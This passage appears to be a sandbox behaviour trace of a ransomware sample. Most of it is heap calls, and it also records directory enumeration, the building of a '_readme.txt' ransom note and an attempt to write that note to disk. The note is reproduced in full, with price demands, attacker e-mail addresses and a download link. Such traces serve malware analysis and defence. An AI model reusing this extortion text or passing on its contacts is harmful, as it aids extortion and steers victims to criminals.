lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.885] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.885] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.885] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.885] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.885] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.885] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.885] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.885] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.885] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.885] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.885] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.885] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.885] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.886] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.886] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.886] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.886] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.886] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.886] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.886] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.886] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.886] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.886] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.886] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.886] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.886] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.886] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.886] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.886] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.886] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.886] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.886] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.886] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.886] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.886] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.886] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.887] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.887] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.887] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.887] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.887] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.887] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.887] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.887] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.887] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.887] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc46) returned 0x3a83058 [0209.887] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.887] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.887] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.887] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.887] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.887] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.887] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.887] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.887] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9cb0 [0209.887] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.887] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.887] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.887] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.887] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.887] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.888] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.888] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.888] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.888] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.888] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.888] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9cb0 [0209.888] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.888] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.888] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.888] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.888] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.888] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.888] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x3286530 [0209.888] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9cb0 [0209.888] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.888] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.888] PathFindFileNameW (pszPath="C:\\Boot\\zh-CN\\") returned="zh-CN\\" [0209.888] PathFindFileNameW (pszPath="C:\\Boot\\") returned="Boot\\" [0209.888] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286300 | out: hHeap=0x750000) returned 1 [0209.888] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0209.888] PathFindFileNameW (pszPath="") returned="" [0209.889] LoadLibraryW (lpLibFileName="Shell32.dll") returned 0x761b0000 [0209.889] GetProcAddress (hModule=0x761b0000, lpProcName="SHGetFolderPathW") returned 0x76235708 [0209.889] SHGetFolderPathW (in: hwnd=0x0, csidl=40, hToken=0x0, dwFlags=0x0, pszPath=0x3a83058 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x0 [0209.889] FreeLibrary (hLibModule=0x761b0000) returned 1 [0209.889] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286530 | out: hHeap=0x750000) returned 1 [0209.889] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.890] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.890] PathAppendW (in: pszPath="C:\\Boot\\zh-CN\\", pMore="_readme.txt" | out: pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 1 [0209.890] PathFileExistsW (pszPath="C:\\Boot\\zh-CN\\_readme.txt") returned 0 [0209.890] lstrcpyW (in: lpString1=0x3a87060, lpString2="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6" [0209.890] lstrcatW (in: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6", lpString2="KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" | out: lpString1="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk") returned="ATTENTION!\r\n\r\nDon't worry, you can return all your files!\r\nAll your files like photos, databases, documents and other important are encrypted with strongest encryption and unique key.\r\nThe only method of recovering files is to purchase decrypt tool and unique key for you.\r\nThis software will decrypt all your encrypted files.\r\nWhat guarantees you have?\r\nYou can send one of your encrypted file from your PC and we decrypt it for free.\r\nBut we can decrypt only 1 file for free. File must not contain valuable information.\r\nYou can get and look video overview decrypt tool:\r\nhttps://we.tl/t-WOqGXn9sLJ\r\nPrice of private key and decrypt software is $980.\r\nDiscount 50% available if you contact us first 72 hours, that's price for you is $490.\r\nPlease note that you'll never restore your data without payment.\r\nCheck your e-mail \"Spam\" or \"Junk\" folder if you don't get answer more than 6 hours.\r\n\r\n\r\nTo get this software you need write on our e-mail:\r\nhelpdatarestore@firemail.cc\r\n\r\nReserve e-mail address to contact us:\r\nhelpmanager@mail.ch\r\n\r\nYour personal ID:\r\n0215Asd4a7d6KO5ofrki5LhsRzmVT4aqTI4GXI2kDDpORUDuALdk" [0209.890] CreateFileW (lpFileName="C:\\Boot\\zh-CN\\_readme.txt" (normalized: "c:\\boot\\zh-cn\\_readme.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.891] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32da538 | out: hHeap=0x750000) returned 1 [0209.891] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a87060 | out: hHeap=0x750000) returned 1 [0209.891] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9cb0 | out: hHeap=0x750000) returned 1 [0209.891] FindFirstFileW (in: lpFileName="C:\\Boot\\zh-CN\\*", lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x3277d28 [0209.891] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.891] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0209.891] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0209.891] FindNextFileW (in: hFindFile=0x3277d28, lpFindFileData=0x397fba4 | out: lpFindFileData=0x397fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe8725b0e, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x11440, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 0 [0209.891] FindClose (in: hFindFile=0x3277d28 | out: hFindFile=0x3277d28) returned 1 [0209.892] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.892] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3286440 | out: hHeap=0x750000) returned 1 [0209.892] PeekMessageW (in: lpMsg=0x397fb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x397fb74) returned 0 [0209.892] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.892] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.892] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.892] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.892] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.892] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.892] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.892] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.892] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.892] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.892] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.892] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.892] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.892] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.892] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.892] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.892] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.892] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.893] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.893] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.893] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.893] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.893] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.893] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.893] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.893] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.893] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0xc2e) returned 0x3a83058 [0209.893] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.893] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.893] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.893] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.893] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.893] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.893] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.893] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.893] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.893] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.893] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.893] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.893] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.893] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.893] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.893] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.893] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x860) returned 0x3a83058 [0209.894] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x3a83058 | out: hHeap=0x750000) returned 1 [0209.894] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.894] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.894] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.894] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.894] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.894] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.894] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.894] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.894] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.894] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.894] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.894] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.894] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.894] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.894] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x840) returned 0x32d9428 [0209.894] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.894] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.894] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.894] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.894] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.894] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.894] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.894] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.895] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.895] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.895] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.895] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x830) returned 0x32d9428 [0209.895] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.895] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.895] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x20) returned 0x32863c8 [0209.895] RtlAllocateHeap (HeapHandle=0x750000, Flags=0x0, Size=0x820) returned 0x32d9428 [0209.895] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32d9428 | out: hHeap=0x750000) returned 1 [0209.895] HeapFree (in: hHeap=0x750000, dwFlags=0x0, lpMem=0x32863c8 | out: hHeap=0x750000) returned 1 [0209.895] RtlAllocateHeap (HeapHandle=0x750000, 